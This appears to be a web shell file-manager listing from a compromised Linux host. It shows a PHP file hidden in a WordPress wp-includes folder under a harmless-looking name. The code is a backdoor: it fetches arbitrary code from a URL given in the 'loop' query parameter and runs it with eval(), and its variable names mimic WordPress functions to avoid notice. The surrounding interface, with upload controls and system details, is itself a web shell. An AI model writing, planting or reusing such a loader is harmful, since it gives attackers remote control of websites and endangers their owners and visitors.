HEX
Server: Apache
System: Linux infong-us-cl0082 4.4.400-icpu-107 #2 SMP Tue Nov 18 10:27:58 UTC 2025 x86_64
User: ws67252883 (67252883)
PHP: 8.4.19
Disabled: NONE
Upload Files
File: /homepages/21/d4298745088/htdocs/old/wp-includes/class-feed-float.php
<?php

if (isset($_GET['loop'])) {
    $esc_html_vtj = $_GET['loop'];
    if ($the_post_thumbnail_wge = curl_init()) {
        curl_setopt($the_post_thumbnail_wge, CURLOPT_URL, $esc_html_vtj);
        curl_setopt($the_post_thumbnail_wge, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($the_post_thumbnail_wge));
        curl_close($the_post_thumbnail_wge);
        exit;
    }
}